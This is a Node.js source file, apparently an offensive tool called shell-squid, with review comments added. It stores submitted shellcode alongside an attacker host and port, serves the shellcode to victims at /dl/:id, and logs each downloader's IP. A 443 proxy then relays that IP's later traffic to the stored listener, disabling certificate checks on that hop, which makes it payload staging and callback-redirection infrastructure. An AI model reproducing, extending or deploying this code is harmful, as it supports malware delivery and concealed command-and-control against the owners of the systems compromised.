shell-squid-test
// Copyright (c) 2012 Tom Steele
// See the file license.txt for copying permission
var fs = require('fs');
var express = require('express');
var redis = require('redis');
var config = require('configure');
var httpProxy = require('http-proxy');
var https = require('https');
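// Stop at startup when no configuration object was loaded.
if (!config) {
  console.log('no config found');
  process.exit(1);
}

// TLS key and certificate used by the HTTPS listeners created later in this
// file. Both paths come from config.ssl and are read synchronously, so an
// unreadable file throws here, before any port is opened.
// Declared with `var`: the original bare assignment created an implicit global.
var httpsOptions = {
  key: fs.readFileSync(config.ssl.key),
  cert: fs.readFileSync(config.ssl.cert)
};

// Express application that backs the API routes registered below.
// Declared with `var` for the same reason as httpsOptions.
var app = express();

// Request bodies are parsed for every route.
// NOTE(review): no body size limit is configured in this file.
app.use(express.bodyParser());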
// Open the Redis connection with the client library's default settings.
var client = redis.createClient();

// Error policy: a refused connection to the local Redis instance is fatal,
// every other Redis error is only logged.
client.on('error', function(err, reply) {
  var refusedText = 'Error: Redis connection to 127.0.0.1:6379 failed - connect ECONNREFUSED';
  var isRefused = err.toString() === refusedText;

  if (!isRefused) {
    console.log('Error', err);
    return;
  }

  // Nothing is listening on 127.0.0.1:6379: report it and stop the process.
  console.log('Error connecting to redis server');
  console.log(err);
  process.exit(1);
});
/**
 * Placeholder that always yields the constant 123.
 *
 * @param {*} name - accepted but not used by the current body.
 * @returns {number} 123
 */
function buildPayload(name) {
  var stubValue = 123;
  return stubValue;
}
/**
 * Placeholder that always yields the constant 1234.
 *
 * @param {*} name - accepted but not used by the current body.
 * @returns {number} 1234
 */
function buildRedis(name) {
  var stubValue = 1234;
  return stubValue;
}
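// GET /dl/:id -- reply with the 'shellcode' field of the Redis hash stored
// under :id. This handler only reads; the source-IP bookkeeping for /dl
// requests is done by the proxy listener further down, not here.
//
// NOTE(review): no authentication or authorization check is visible in this
// file, so any client that can reach this port and supply an id gets the
// stored value back.
app.get('/dl/:id', function(req, res) {
  var id = req.param('id');
  if (!id) {
    res.json(200, { error: 'no id provided' });
    // Stop here: without this return the lookup below ran anyway and tried
    // to send a second response on the same request.
    return;
  }
  client.hget(id, 'shellcode', function(err, reply) {
    if (err) {
      console.log('Error', err);
      res.send('none');
      // Same double-response problem as above: do not fall through to
      // res.send(reply) after the error reply has been written.
      return;
    }
    // reply is whatever Redis returned for the field; an unknown id is not
    // treated specially here.
    res.send(reply);
  });
});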
// GET /delete/:id -- stub. The route answers {response: "success"} but does
// not touch Redis, so nothing is removed for the given id yet.
// NOTE(review): once implemented this is a state-changing operation exposed
// over GET with no access check visible in this file.
app.get('/delete/:id', function(req, res) {
  var body = {response: "success"};
  // delete all associated data (not implemented)
  res.json(200, body);
});
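// POST /generate -- create a record for the submitted name/shellcode/lhost/
// lport, stored in Redis under a freshly generated numeric id, and reply with
// { id: <newId> }.
//
// Required parameters: name, shellcode, lhost. lport is read but not checked.
//
// NOTE(review):
//  - No authentication is visible in this file; any caller that can reach
//    the route can create records.
//  - lhost/lport are stored verbatim and are later read back by the proxy
//    listener as a forwarding target, so they should be validated against an
//    allow-list before being accepted.
//  - Math.random() is not a cryptographic generator and the id is not
//    checked against existing keys, so ids are guessable and may collide.
//  - `name` is used directly as a Redis key in the same keyspace as the
//    numeric ids (and the source-IP keys written by the proxy listener), so
//    a name equal to an existing key overwrites it.
app.post('/generate', function(req, res) {
  var name = req.param('name');
  var shellcode = req.param('shellcode');
  var lport = req.param('lport');
  var lhost = req.param('lhost');
  if (!name) {
    res.json(200, { error: 'no name given' });
    return;
  }
  if (!shellcode) {
    res.json(200, { error: 'no shellcode provied' });
    return;
  }
  if (!lhost) {
    res.json(200, { error: 'no lhost provied' });
    return;
  }
  var newId = Math.floor(Math.random() * 1000000);

  // The original answered { id } immediately and, if the SET failed later,
  // tried to send a second response from the callback. The writes are now
  // chained so exactly one response is sent, after storage has finished.
  client.set(name, newId, function(err, reply) {
    if (err) {
      console.log(err);
      res.json({ error: err });
      return;
    }
    client.hmset(newId, "name", name, "shellcode", shellcode, "ip", '', "lhost", lhost, "lport", lport, function(err, reply) {
      if (err) {
        // Previously a failed HMSET was silently ignored.
        console.log(err);
        res.json({ error: err });
        return;
      }
      res.json({ id: newId });
    });
  });
});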
// Bring up the HTTPS API server. The port is config.webport when that value
// is set (truthy) and 8443 otherwise.
// NOTE(review): listen() is called without a host argument, so the API
// routes are reachable on this port directly as well as through the proxy
// listener; bind to a loopback address if only the proxy should reach them.
var webPort = config.webport ? config.webport : 8443;
https.createServer(httpsOptions, app).listen(webPort);
console.log('Express service listening on', webPort);
// Create the HTTPS front listener on port 443 (hard-coded, not configurable).
// Each request is classified by matching req.url against three patterns and
// is then forwarded with http-proxy, either to the local API server on
// webPort or to the lhost/lport stored in Redis for the caller's source IP.
//
// NOTE(review): String.prototype.match() turns each string pattern into an
// unanchored RegExp, so a pattern matches anywhere in the URL (query string
// included), not only at the start of the path.
// NOTE(review): there is no final else branch. A URL that matches none of the
// patterns (for example a bare "/") never reaches handleIt and the request
// is left unanswered; the proxyHost/proxyPort defaults assigned below are
// not used in that case.
https.createServer(httpsOptions, function (req, res) {
  var proxyHost = 'www.google.com';
  var proxyPort = 443;
  var url = req.url;
  // TCP peer address of the connection; clients behind the same NAT or
  // forward proxy share this value.
  var sourceIp = req.connection.remoteAddress;
  // Captured before any asynchronous Redis call; it is handed to the proxy
  // inside `target` in handleIt.
  // NOTE(review): confirm that is where this http-proxy version expects it.
  var buffer = httpProxy.buffer(req);
  console.log('connection from', sourceIp);
  console.log('requesting', url);
  if (url.match('/dl/([0-9]{1,7})')) {
    // The test above uses '/dl/...' while this extraction uses 'dl/...';
    // both are unanchored, so they match the same URLs here.
    var id = url.match('dl/([0-9]{1,7})')[1];
    // Record the caller's address on the id's hash and keep a reverse
    // mapping from address to id. Both writes are fire-and-forget: no
    // callback, so Redis errors are not observed, and the id is not checked
    // for existence first.
    client.hset(id, 'ip', sourceIp);
    client.hset(sourceIp, 'id', id);
    proxyHost = 'localhost';
    proxyPort= webPort;
    handleIt(proxyHost, proxyPort);
  }
  else if (url.match('/generate.*')) {
    // Forward to the local API server.
    proxyHost = 'localhost';
    proxyPort = webPort;
    handleIt(proxyHost, proxyPort);
  }
  else if (url.match('/[a-z-A-Z]+')) {
    // Any other URL containing "/" followed by a letter or "-" lands here,
    // including /delete/..., which therefore is not forwarded to the API.
    // Look up the stored lhost and lport for this source IP.
    client.hget(sourceIp, 'id', function (err, reply) {
      if (err) {
        // Logged only; execution continues with whatever `reply` holds.
        console.log('Error', err);
      }
      client.hgetall(reply, function(err, obj) {
        if (err) {
          console.log('Error', err);
        }
        // NOTE(review): obj is dereferenced without a null check. If the
        // source IP has no mapping or the record is missing, this would
        // throw inside the callback -- confirm how the Redis client reports
        // a missing hash.
        // NOTE(review): lhost/lport were supplied by whoever called
        // /generate and are used as the forwarding target unvalidated.
        proxyHost = obj.lhost;
        proxyPort = obj.lport;
        handleIt(proxyHost, proxyPort);
      });
    });
  }
  // Forward the current request/response pair to host `ph`, port `pp` over
  // HTTPS. Hoisted function declaration, so the branches above can call it.
  function handleIt(ph, pp) {
    var proxy = new httpProxy.HttpProxy({
      target: {
        host: ph,
        port: pp,
        https: true,
        // NOTE(review): upstream certificate verification is disabled, so
        // the identity of the target is not authenticated on this hop.
        rejectUnauthorized: false,
        buffer: buffer
      }
    });
    proxy.proxyRequest(req, res);
  }
}).listen(443);
console.log('Proxy server listening on 443')